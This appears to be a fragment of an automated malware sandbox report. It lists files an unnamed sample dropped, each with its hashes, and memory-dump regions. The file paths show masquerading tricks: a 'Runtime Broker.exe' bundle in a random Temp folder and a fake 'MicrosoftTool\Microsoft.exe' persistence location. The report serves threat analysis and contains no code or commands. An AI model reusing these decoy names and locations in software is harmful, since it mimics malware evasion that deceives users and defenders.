SHA512 7bdc8d73963c5a788ccfd3982fd337b6749726ad7e3e6c77fc2763923d05a8ba9bce53a7dd29becedf13486469818584b82fa4e5f55604936f26b158ae84a939

C:\Users\Admin\AppData\Local\Temp\bfe714fc-0432-4bf3-8a30-04a7c15bf15a.tmp.node

MD5 1a299eb80ff45e6b5d3f60ba1e742330
SHA1 0b6b4c055fbafa4c74e29433bbd9159d70a0a810
SHA256 eb8e3b832be25c7edb6859fbbb6dd14e1472f2ced7100bc56feb6801404cc3ba
SHA512 27176a62173baa0ecbc80c455513a416582d0c4ddc4e4eb3d3111c921bab83e72519917c254e73d3d2271deefe3c2453cb5c860ef931ab689135509fb91331ed

C:\Users\Admin\AppData\Local\Temp\197dca53-a18c-4519-b54c-bbe76231cc7a.tmp.node

MD5 6e3812a27900dc215f176d9285605ba2
SHA1 d513ced5346dc8bfe4eddae95e836daa54b605e5
SHA256 5bbc9aff85146c251a787455a1c274e32d753630c3c37fbadeb1c25a5d1e123a
SHA512 1dc2710020177d47c1cd3979d866826148f37650c436ea260b95600a9d91a5207bc3b9f0721edb26e1b7e602a976a8af405cd64d23033259718a648ee69a3205

C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\resources.pak

MD5 cb824a6f9f8c06484bf6bf33a869f0b5
SHA1 18f955596dde8ce23eee7a0f5167a6b5a40b764f
SHA256 fa6c2ddf19f77e4b10f3582c837ab1ba80d9229508f83903f3de0904a62dd63c
SHA512 2fe561796fc2487b476ca50e10784c28ee0e18784d320ce717b9c688d0adec4dc963b2e48e8fb430c941b67a0ee499283e6afec25021667d334cae1c089ae692

C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe

MD5 13bbcffba36f557fe57faa43a50d974a
SHA1 189b12adaf9738f96b6b04e3e7785fecb4728ad0
SHA256 1d2f4507fc098d6ff14b84306a203672ca777595de4338d6278cb2b9ea4ad816
SHA512 5586e963ac1bd1b1f050c44d0fb136c6e7ae87fad8ccfe0b34d06def876d78ccf2e2dd5767f355b7c0d159b32ee8552417f2a998f1367c47c2319acc8cb7ffd7

C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\ffmpeg.dll

MD5 d4a45c5ef6a2bb33b794a5c2b5f4e173
SHA1 304313589a038943b33c62360c032c0edb432e48
SHA256 87a98421744dff603c45f2eb4b52a6347b8b75c8eee8f825a935c31e28112516
SHA512 d7b878b7c337e9fb1bd3575cbec9756cbcd575bb3a5416f4dcaf33eb657e0b207b2b389e06dbbbdf063e4a1f142c4edf380bdafca9684e43dfba0f5d0f9a4e82

C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe

MD5 d7ddef81425dca9d1cb32ffaac4f25db
SHA1 6e72a13a25a7ce051dd93532325c2cac365f00cc
SHA256 096dbf90a3a19b927b071c783793f9199a09c2ea2fd9b7a3ef20416e414778fd
SHA512 f308fe2a8708ed3c48c9e1860c0b2bc36da4285deefe2999d37c0c10f22b1b585cac65535482514ffdf894810cbbeb4348b0fd0e57840b15d093707d23421206

C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\libGLESv2.dll

MD5 96e9a5dc92aca7f1619c196dfc66a64a
SHA1 3cc8dcabbcd60bffcf763d628d8c22c677d6d67e
SHA256 6a1d5af50dd990c005d9f6d0dc43a7f58afcec4577ff265a79610e89a9c6eec0
SHA512 f3d88edb845c73adf1a47be42f1c5b7d6a5ae1dca9166ca3d6a8c29e38fb7798cee2d8d20b55721d7a46916912ed9a893a2f089f94897ad24d3c87ff92a9c5f7

C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\vk_swiftshader.dll

MD5 1b9b3d0af59dba1f173cbf7ad3ece539
SHA1 3ca6ce70af12559ff505f55e61cbb093f0d2a51c
SHA256 ebc15fb097ea23aa8b8b6dc3c9210c5eefc0d1fd9a0cbc1040af5c06497e9a74
SHA512 661a8aba8c69e2be7fc360b2b51f020bfe7019f92706c0e34de83d59699a723518aaeb288e536a47227e31153461f77a462ed06796cc34a8dafc9bfd2dda8a0c

C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\vk_swiftshader.dll

MD5 d4f03ea034998102272b6dd11de3658b
SHA1 d534766e0b3bc332c5ce055aa07679c98977ed1e
SHA256 4ed96e634cee06078b067f00944cb9b3a4f55ee20ce6f9f8f4f682f5a1a8348e
SHA512 07dec695aa216779294804c984076b3a2878134507d1673e549dbc496b22c50c1a33a53384e4077295ddf88b818b4123f91f245ac93a4d7ec40fb0627883dba0

C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\libglesv2.dll

MD5 dd8120a63518e0887a27c9515185a224
SHA1 31f0afa1d2fecd54d71a1be8b7e1fb3c28ad4c6e
SHA256 ee469f0dfe35700d057cffc35973168086c9de00af15566b798949aabb5c495b
SHA512 8b79def2b05ea13cbdb68efb253a022cc8c1bc76db4446a1269eaf82ba912b444a04ce87ff9dcd7f0ff66026a682666d96ea9005cd40d522b9e762918a7e4a6a

C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\ffmpeg.dll

MD5 e5193e377b03de73468ac57264a5cace
SHA1 8be8a05e821f35ade8a9b2b199542014327bd4dd
SHA256 a3ca6aa7aa0a158a182f441215837761d6dd04522e87d96ef3b268535c167c8d
SHA512 1f2c3c0fecd3efb2735d28bf166086fed81e1636247641a63c0739f5315cf1ce2942aa3237fd98ffdc8de5c59e2e7289346108d593159a48aa178f3e326861e3

C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\Runtime Broker.exe

MD5 5498ceaa043f1c764afd634d7f39e0ae
SHA1 5674cc6644a5e9c0f07995ec4bace71d0cbfbbd0
SHA256 6695e5bb70da377a1d1002b624a65422d774b9b6feb5449dfe5e4b014c0d55db
SHA512 0d4cf86a7cf427b02386a43d7d4def3284b23853c79e5dfff7bb69a76de4874a0527a235d0aaca7e0f8136a5e30e441f586021ffd599efdfd6290faf38398d42

C:\Users\Admin\AppData\Local\Temp\2a8a7jRt8HBr6EplknjhTUoBInc\d3dcompiler_47.dll

MD5 27867ec2995257020805f81a053f09a1
SHA1 57f181e7d69a27dbc5bb5bf5faf4b1bf1ad5ed83
SHA256 8ce4685963381ffcd2cd817eb355dee094bc1f9f27c94fff275cabdb26fe86dc
SHA512 0d7472d35fe9ce182939174e85ee783202eb612d1d925545e65238b73f9021899260bbd733c3097aeb00e45ff3bab83ca0e7503efa2eab3d6a9941d8fd291e96

memory/1100-861-0x00000000057C0000-0x00000000057D0000-memory.dmp

C:\ProgramData\MicrosoftTool\current\Microsoft.exe

MD5 7d6ad6d6c23b44d8c37576fb2f2c5eb0
SHA1 a33ae5163abdc43d9b71cbea485273b8d38c7af5
SHA256 3fb4530693c989f77448ad17fe0a069ab785b05d56f7402a7ddd11de5c923bf5
SHA512 9c7a126509d03aa5a1af6efaf608eaabb262245f8ab59ab0d17d2b2d389121ac69a9277d1ce5a9cc010e5ba06601e0e9a48329f1cb614e86adf8bb4cf0388c38

C:\ProgramData\MicrosoftTool\current\ffmpeg.dll

MD5 afd2a8d788a742c44a121f8cb581be46
SHA1 a72a4263505f466839b61c9113b1844f444a56ff
SHA256 c59198220a5939c2920f2ebf9d7dc133c7ccad2388c5637eb1ecd922b9495852
SHA512 cad6b6005e72d40a82eb0decc931f25eaf69adc6b228f19b492577f04e7a894d0d97e4c4c0d77eed82de0aba8c32d8edf28b2ce396ff223848c3721718c9c167

C:\ProgramData\MicrosoftTool\current\v8_context_snapshot.bin

MD5 067b049cf02325f2ba017887051bee31
SHA1 afc4fd114d6a34891fb23f043aa99afac6dd8e63
SHA256 b604041f85fb693f130bf0ae60ce83ebfca56371cec261085620e56ae93ab591
SHA512 f9948e9f65ba6d86ae4fe6ec407fb393a05cb28c100a7638127572ab1c18be2b4333f619472c3a19eb19337739c10a79ba04325a555442ab35cff0b6e8847904

C:\ProgramData\MicrosoftTool\current\icudtl.dat

MD5 8caccd6a847d9603e615755f130eed63
SHA1 e953602a5fe9b47770fccfd270a280749ce8fc33
SHA256 01046ba0b2af86a7ba7d8e364ef0006d581dd1932cf1e920064adc0d2961b74c
SHA512 183005f86d42d637a111c83d5fddec817c6b6e40ab21f31e626440402eda6eee349b0f7ab4863cfc7d3aa931bf53f3bf98f7fa516adaa6e0adc48974c30fb94b

memory/4184-869-0x0000000074400000-0x0000000074BB0000-memory.dmp

C:\ProgramData\MicrosoftTool\current\Microsoft.exe

MD5 b6c9f9b6b67c27739d9ca36d4f8dc967
SHA1 0a53de6c1612774d3affddfc2066b9cd1bb00947
SHA256 429603da8bfbb41a965317c010a7317cc7f3e6a9ffd080469eecb52b80c34251
SHA512 c300de987310505e2cc7a60c98d2d65b640533721f0389213eb508817f1f15d15b1254b33432645691350c8a42002507effed5362522ec778eb11416e56bd94d

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aitstatic.exe.log

MD5 916851e072fbabc4796d8916c5131092
SHA1 d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA256 7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA512 07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

memory/716-874-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4972-875-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4972-876-0x0000000004C40000-0x0000000004C50000-memory.dmp

memory/4652-877-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4652-878-0x0000000004CF0000-0x0000000004D00000-memory.dmp

memory/716-882-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4652-883-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4972-884-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/1856-886-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/1684-887-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4548-888-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4648-889-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4472-895-0x00007FF9B8EC0000-0x00007FF9B8EC1000-memory.dmp

memory/1684-901-0x00000000050B0000-0x00000000050C0000-memory.dmp

memory/4648-902-0x00000000057B0000-0x00000000057C0000-memory.dmp

memory/4712-926-0x00007FF999780000-0x00007FF99A241000-memory.dmp

memory/4712-927-0x0000017B21C00000-0x0000017B21C10000-memory.dmp

memory/4712-928-0x0000017B21C00000-0x0000017B21C10000-memory.dmp